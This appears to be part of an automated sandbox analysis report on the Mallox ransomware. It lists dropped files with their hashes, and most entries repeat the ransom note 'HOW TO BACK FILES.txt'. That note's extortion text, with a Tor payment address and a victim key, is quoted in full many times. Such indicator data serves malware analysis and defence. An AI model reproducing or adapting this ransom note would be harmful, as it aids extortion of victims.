                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_1263179476\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_1400817038\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_1411849101\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_1647260790\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_2064033610\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_225825923\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_54412351\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_609279726\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_644283141\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_645332664\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_896228831\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_994183821\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\mozilla-temp-files\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\msedge_url_fetcher_5488_547689517\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\VirtualStore\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\bb7e5d0cf2dfb2b59be71d56e848e059_9e146be9-c76a-4720-bcdb-53011b87bd06

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):45
                    Entropy (8bit):0.9111711733157262
                    Encrypted:false
                    SSDEEP:3:/lwltAOl:WKK
                    MD5:1249116D570D2994CF7B4CD674646796
                    SHA1:13E7AF8AC4636DBAED0C23C14B17ACEA00F87214
                    SHA-256:487DC40611285BD6566DD58CD32B8FFF1C56CCB9924EC2DCB74C76F421C8F9AD
                    SHA-512:849529569C30BDAE95C6B2609A75E9B7C263E370BFB03680BF648FCE4CF9FEF9AB4AB25C4738CCC3642727B18DB68E94D97CB0D0D833E19795076FB7FDB5269B
                    Malicious:false
                    Preview:........................................user.

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
